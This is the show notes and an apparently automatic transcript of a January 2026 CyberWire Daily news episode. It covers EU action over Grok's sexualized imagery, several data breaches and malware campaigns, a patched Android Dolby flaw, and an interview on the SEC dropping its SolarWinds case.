CyberWire Daily - X marks the violation.
Episode Date: January 6, 2026Grok’s non-consensual imagery draws scrutiny from the European Commission. Researchers link several major data breaches to a single threat actor. The UK unveils a new Cyber Action Plan. A stealthy... ClickFix campaign targets the hospitality sector. VVS Stealer malware targets Discord users. Covenant Health and AFLAC report data leaks. Google silences a critical Dolby flaw. Ilona Cohen, Chief Legal and Policy Officer at HackerOne discusses “What the SolarWinds Dismissal Really Means for CISOs: Less Personal Risk, More Scrutiny on Disclosures.” UK students enjoy a digital snow day. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you’ll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Today we are joined by Ilona Cohen, Chief Legal and Policy Officer at HackerOne and former senior lawyer to President Obama, as she is discussing “What the SolarWinds Dismissal Really Means for CISOs: Less Personal Risk, More Scrutiny on Disclosures.” Selected Reading EU looking ‘very seriously’ at taking action against X over Grok (The Record) Grok's AI CSAM Shitshow (404 Media) Dozens of Major Data Breaches Linked to Single Threat Actor (SecurityWeek) UK Launches New Cyber Unit to Bolster Defences Against Cyber Threats (Infosecurity Magazine) Sophisticated ClickFix Campaign Targeting Hospitality Sector (SecurityWeek) New VVS Stealer Malware Targets Discord Users via Fake System Errors (Hackread) Covenant Health Notifying 480K Patients of 2025 Data Theft (Infosecurity) Aflac Notifies 22.6 Million People of June Data Theft Attack (Infosecurity) Critical Dolby leak in Android patched by Google (Techzine Global) Students bag extended Christmas break after cyber hit on school IT (The Register) Share your feedback. What do you think about CyberWire Daily? Please take a few minutes to share your thoughts with us by completing our brief listener survey. Thank you for helping us continue to improve our show. Want to hear your company in the show? N2K CyberWire helps you reach the industry’s most influential leaders and operators, while building visibility, authority, and connectivity across the cybersecurity community. Learn more at sponsor.thecyberwire.com. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyberwire Network, powered by N2K.
Ever wished you could rebuild your network from scratch to make it more secure, scalable, and simple?
Meet Meter, the company reimagining enterprise networking from the ground up.
Meter builds full-stack, zero-trust networks, including hardware, firmware, and software,
all designed to work seamlessly together.
The result, fast, reliable, and secure connectivity
without the constant patching, vendor juggling, or hidden costs.
From wired and wireless to routing, switching firewalls, DNS security, and VPN,
every layer is integrated and continuously protected in one unified platform.
And since it's delivered as one predictable monthly service,
you skip the heavy capital costs and endless upgrade cycles.
Meter even buys back your old infrastructure to make switching effortless.
Transform complexity into simplicity and give your team time to focus on what really matters,
helping your business and customers thrive.
Learn more and book your demo at meter.com slash cyberwire.
That's M-E-T-E-R dot com slash cyberwire.
GROC's non-consensual imagery draws scrutiny from the European Commission.
Researchers link several major data breaches to a single threat actor.
The UK unveils a new cyber action plan.
A stealthy click-fix campaign targets the hospitality sector.
VVS Steeler malware targets Discord users.
Covenant Health and Afflack report data.
leaks. Google's silences a critical Dolby flaw. Alana Cohen, chief legal and policy officer at
Hacker 1, joins us to discuss what the solar winds dismissal really means for Sissos. And UK
students enjoy a digital snow day.
It's Tuesday, January 6, 2026.
I'm Dave Bittner, and this is your Cyberwire Intel briefing.
Thanks for joining us here today.
It's great as always to have you with us.
European Commission is considering enforcement action against X Twitter after its artificial
intelligence tool, GROC, was used to generate sexualized images of a minor. The issue surfaced
after GROC responded to prompts to digitally remove clothing from images, including one involving
a 14-year-old actress amid wider misuse to create non-consensual sexual imagery of women.
Commission's spokesperson Thomas Rainier said officials are very seriously examining the matter,
calling the outputs illegal and unacceptable in Europe.
He noted this was not the first problematic incident involving GROC and referenced prior concerns,
including the spread of Holocaust denying material.
The scrutiny follows a 120 million euro fine issued to X under the Digital Services Act,
which X criticized as political censorship.
The controversy has intensified tensions
between the EU and the United States
over platform regulation.
Meanwhile, investigations are also underway in France,
and the UK regulator Offcom has warned
that creating non-consensual intimate images
is a criminal offense
and is assessing X's compliance with UK law.
Security firm Hudson Rock
reports that several major data breaches are linked to a threat actor known as Zestix,
also associated with the persona centap.
The actor functions as an initial access broker,
using stolen credentials harvested by information-stealing malware to break into enterprise networks,
exfiltrate data, and sell both data and system access on underground forums.
Hudson Rock says the credentials were collected from infected employee devices,
sometimes sitting in logs for years before being exploited.
Weak protections, particularly the absence of multi-factor authentication on file-sharing services,
enabled repeated compromises.
Victims span aerospace, government, health care, legal, and robotics sectors,
with stolen data sets reportedly sold for up to $150,000.
The findings highlight the long-running Info-Stealer problem,
where malware-as-a-service has commoditized cybercrime
and made large-scale credential theft easier, faster, and harder to detect.
The U.K. government has unveiled a new cyber action plan
that includes a centralized cyber unit
and a software security ambassador scheme
to strengthen public sector cyber resilience.
The measures follow several high-profile 25 cyber incidents
affecting organizations such as Jaguar Land Rover, Marks, and Spencer, and the Co-op, as well as a
recent attack on a supplier to the National Health Service. Backed by 210 million pounds in funding,
the plan aims to raise baseline security standards and improve coordinated incident response.
The new government cyber unit housed within the Department for Science, Innovation, and Technology
will oversee cross-department risk management.
The Ambassador Scheme promotes a voluntary software security code of practice
to reduce supply chain risk.
While widely welcomed, some experts warn the funding may fall short of the challenges scale.
Security firm Securonics warns of a stealthy click-fix fishing campaign
targeting the hospitality sector to deliver remote access Trojans.
The attack uses fakebooking.com cancellation emails
that lure victims to impersonation sites with deceptive captia and fake blue-screen messages.
Victims are tricked into running power shell commands that deploy a customized DC rat.
The malware disables defenses, establishes persistence,
and uses resilient command and control techniques designed to survive infrastructure takedowns.
Researchers at Palo Alto Network's Unit 42 have disclosed details of VVS,
Steeler, a Python-based malware targeting Discord users. Active since at least April 2025,
the malware is distributed as a Pi installer package, allowing it to run easily on Windows systems.
Its primary goal is to steal Discord authentication tokens, giving attackers access to private
messages, accounts, and potentially billing data. VVS Steeler uses fake error messages to trick users into
rebooting, then performs a Discord injection that modifies application files to monitor activity
in real time. It also harvests credentials from major browsers, captures screenshots, and
infiltrates data via webhooks. Unit 42 reports the malware is sold as a subscription service
on Telegram, highlighting the continued commercialization of credential-stealing malware.
Nearly 478,000 patients of Covenant Health are being notified that their data may have been stolen in a May 2025 cyber attack.
The incident, claimed by the Keelan Ransomware Group, initially appeared limited but was later found to have a far wider impact.
Potentially exposed data includes personal insurance and medical information.
Covenant says it shut down systems to contain the attack and has since since,
strength and security, though details remain limited.
Affleck is notifying 22.6 million people that their personal and health information may have
been stolen in a June 2025 cyber attack. The insurer says the incident was quickly contained
and did not involve ransomware, but compromised data may include social security numbers and
health details. The breach could become the largest U.S. health data incident reported in 2025.
AFLAC is offering credit monitoring, while multiple class action lawsuits have been filed amid speculation,
unconfirmed by the company, that Scattered Spider was involved.
Google has patched a critical vulnerability affecting the Android implementation of Dolby software.
The flaw is a buffer overflow in multiple Dolby UDC versions.
According to WIS, the issue stems from Imbrose,
proper buffer allocation when processing evolution data, leading to out-of-bounds rights and
potential data leakage. Dolby rated the bug as moderate severity, noting it typically causes
media player crashes. Google, however, classifies it as critical, warning that combined
with other Android flaws, it could have greater impact, particularly on pixel devices. The
vulnerability has now been fixed through Android security updates.
Coming up after the break, my conversation with Alana Cohen,
chief legal and policy officer at Hacker 1,
and UK students enjoy a digital snow day.
what's your 2 a.m. security worry is it do I have the right controls in place maybe are my vendors secure or the one that really keeps you up at night how do I get out from under these old tools and manual processes that's where Vanta comes in Vanta automates the manual works so you can stop sweating over spreadsheets chasing audit evidence and filling out endless questionnaires their trustmen
management platform continuously monitors your systems, centralizes your data, and simplifies your
security at scale. And it fits right into your workflows, using AI to streamline evidence
collection, flag risks, and keep your program audit ready all the time. With Vanta, you get everything
you need to move faster, scale confidently, and finally get back to sleep. Get started at Vanta.com
slash cyber. That's V-A-N-T-A dot com slash cyber.
Most environments trust far more than they should, and attackers know it.
Threat Locker solves that by enforcing default deny at the point of execution.
With Threat Locker Allow listing, you stop unknown executables cold.
With ring fencing, you control how trusted applications behave, and with Threat Locker
DAC, defense against configurations, you get real assurance that your environment is free of
misconfigurations and clear visibility into whether you meet compliance standards.
Threat Locker is the simplest way to enforce zero-trust principles without the operational pain.
It's powerful protection that gives CISO's real visibility, real control, and real peace of mind.
Threat Locker makes zero-trust attainable, even for small security teams.
See why thousands of organizations choose threat lock.
Locker to minimize alert fatigue, stop ransomware at the source, and regain control over their
environments. Schedule your demo at Threatlocker.com slash N2K today.
Ilana Cohen is Chief Legal and Policy Officer at Hacker 1. She joins me to discuss what the
solar winds dismissal really means for Sissos?
The company had a fairly sizable breach.
Securities and Exchange Commission in 2023.
They brought a claim against the company and its CISO for the way they handled the response
to that breach and the disclosures that they made prior to it.
That brought shockways to the community because it was the first time that a CISO was charged.
for activities relating to the company as a whole.
Well, let's talk about that a bit,
because I remember this happening,
and as you say, lots of conversation,
particularly among CSOs.
What were the fears here,
the peril that this could put them in?
Well, the SEC charge of the CSO
over alleged misrepresentations about cybersecurity.
and the SEC had a very broad reading of its authority. And honestly, they've had a very broad
reading of that authority for a long time. But here, the claim was because it has control
and oversight over a company's internal accounting controls, the SEC's reading was extremely
broad because, you know, you can imagine that the SEC Act that they're relying on doesn't say
anything about cybersecurity at all. And so for them to reach a conclusion that not only they could
police what the company said to its investors, but how they managed their cybersecurity program
in great detail was, you know, not something that came naturally by a reading of the statute.
I see. So take us through what has.
has changed over time to get us where we are today and the SEC changing their direction?
Well, I wouldn't call it a complete retreat, but it is a definite recalibration for the SEC.
In 2024, the first time a court had an opportunity to review this case, they threw out about all of the charges except for a handful.
less than a handful.
And that's because they rejected that broad theory
that internal and counting rules could be used stretched
to cover all aspects of a cybersecurity program design.
So in light of that rejection,
the SEC had to really consider,
well, do we want to worry or risk further narrowing our authority
in this new environment,
or will we either settle this case,
which is something that they signaled for a very long time
or just dismiss it altogether
in order to be able to preserve the authority
that they believe that they have.
And that is the choice that they ultimately took.
They decided to dismiss this case
and not risk the chance
that a subsequent court would restrict their authority even further.
I see.
So to what degree, if any,
is this a result of shifting administration
so that the Trump administration, for example,
would have a different attitude than the Biden administration, if at all?
It's a great question, and it's something that many folks have been debating.
But instead of the administration shift,
I actually think it is primarily the result of a Supreme Court precedent
and a major shift in the way that the Supreme Court has addressed.
agency interpretation of their own legal statutes that govern them. So at the end of the
2024 term, right around the time that the district court was deciding this case, and before
the SEC decided to dismiss the whole thing altogether, the Supreme Court issued a ruling called
in Loper Bright, which overturned about 40 years of precedent established by the Chevron case.
And that required judges to defer to a federal agency's interpretation of an ambiguous law.
And, you know, again, providing that that interpretation was reasonable.
So in that example, if Chevron deference were still in place, then, you know, the court would have had to defer to the SEC to interpret their statute and to take enforcement actions that were related to that statute.
But now, in this new universe where courts have no reason or no need to defer to agencies on how they interpret their law, then I think the court would have looked at this anew and had a lot of good questions about why the SEC was interpreting this law that has nothing to do with cybersecurity in a way that essentially micromanages a company's cybersecurity.
security program. Yeah, that's interesting. So is it a case of it not necessarily being the shift
in the presidential administration, but the shift of the makeup and preferences of this Supreme Court?
I wouldn't say that the shift administration had nothing to do with it, because there are different
enforcement priorities any time you shift administrations. And so you certainly could see that here
and it would be reasonable to say that that plays some part of it.
But in my view, the real reason not to pursue this case is because it could potentially weaken the authority that the SEC has been relying on for some time.
I see.
So given everything that's happened, if I'm a CISO, what should I be thinking these days?
Well, that's a great question.
they're all breathing a sigh of relief.
There's no question about that.
If I were a CISO, I would take a very deep breath and feel comforted by the fact that there's
much less likelihood that I will be charged by the SEC personally.
However, that doesn't mean they have a completely blank check.
And I don't think any CISO I know certainly is thinking that they can just
do anything, get away with anything, that's certainly not the type that takes that job.
So they're still worried about making sure that if they're worried about SEC enforcement,
they should be worried about whether or not they are saying the right thing to investors.
Am I suggesting that I have a very robust program?
And, you know, even though there's documentation to suggest otherwise, am I doing anything, or is the company doing anything that directly contradicts what is in the record with respect to the cybersecurity program?
Because really, the SEC's authority, the heart of the SEC's authority is about making sure that you're not misleading investors.
And so the CSO finds him or herself at a very important.
important point where they're working with legal and they're working with the board and they're
working with, you know, the company's leadership to make sure that what you say to the public
is actually accurate and it reflects the, you know, the reality of the program. So that's
something that there will, that will, I don't think that's an authority that will ever be taken away
from the SEC. That's Alana Cohen from Hecker 1.
And finally, in a modern twist on the traditional snow day,
students at Higgum Lane School in Warquisher earned an unscheduled extension to their Christmas break.
not thanks to icy roads, but a cyber attack that wiped out the school's IT systems.
Phones, email, servers, and management platforms all went dark,
prompting leaders to close the school and call in a cyber incident response team from the Department for Education.
Head teacher Michael Gannon told parents the shutdown was advised by external experts
and that staff and students should avoid all school systems while investigations continue.
With Google Classroom and SharePoint off-limits,
pupils were redirected to BBC byte-size and Oak National Academy,
proving revision can happen even when the network cannot.
The school has reported the incident to the Information Commissioner's Office,
acknowledging possible data protection implications.
A reopening is planned, but only once systems are safe,
turning this digital outage into a lesson in how fragile school IT
can be.
And that's the Cyberwire.
For links to all of today's stories,
check out our daily briefing at the Cyberwire.com.
We'd love to know what you think of this podcast.
Your feedback ensures we deliver the insights
that keep you a step ahead in the rapidly changing world of cybersecurity.
If you like our show, please share a rating and review in your favorite podcast app.
Please also fill out the survey in the show notes or send an email to Cyberwire at N2K.com.
N2K's senior producer is Alice Carruth.
Our Cyberwire producer is Liz Stokes.
We're mixed by Trey Hester with original music by Elliot Peltzman.
Our executive producer is Jennifer Ibin.
Peter Kilpe is our publisher, and I'm Dave Bittner.
Thanks for listening. We'll see you back here tomorrow.